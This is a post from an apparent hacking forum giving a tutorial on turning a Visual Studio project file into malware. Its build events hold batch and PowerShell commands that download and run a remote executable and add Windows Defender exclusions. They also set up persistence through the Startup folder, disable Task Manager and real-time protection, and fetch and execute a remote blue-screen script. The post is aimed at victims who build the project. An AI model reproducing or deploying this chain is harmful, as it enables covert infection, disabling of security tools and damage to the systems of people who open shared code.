• XSS.stack #1 – первый литературный журнал от юзеров форума

PrivEsc how to hack someone with a sln file - get uac + turn off wd + bsod + disable task manager + exclusions

ablo

floppy-диск
Пользователь
Регистрация
27.07.2022
Сообщения
9
Реакции
2
hey today i will tech you how to hack someone with a visual studio project file

1. create a project or grab one of the internet
2. go to build events
3. type the code

:: downloa and execute
powershell -Command Invoke-WebRequest [DIRECT LINK TO UR EXE] -Outfile C:\Windows\Temp\Payload.exe
start C:\Windows\Temp\Payload.exe

:: add to exclusions wd
powershell -Command Add-MpPreference -ExclusionExtension "[path to file to add to exclusion]"
copy "[PATH ADD TO STARTUP]" "%USERPROFILE%\Start Menu\Programs\Startup"
ECHO REGEDIT4 > %WINDIR%\DXM.REG
echo. >> %WINDIR%\DXM.reg

:: disable task manager
echo [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System] >> %WINDIR%\DXM.reg
echo "DisableTaskMgr"=dword:1 >> %WINDIR%\DXM.reg

:: disable wd
powershell -Command Set-MpPreference -DisableRealtimeMonitoring $true

:: bsod
powershell -Command IEX((New-Object Net.Webclient).DownloadString('https://raw.githubusercontent.com/peewpw/Invoke-BSOD/master/Invoke-BSOD.ps1'));Invoke-BSOD


you can edit parts of the code if you want :)

note: victim must click build to get pwned
 


Напишите ответ...
  • Вставить:
Прикрепить файлы
Верх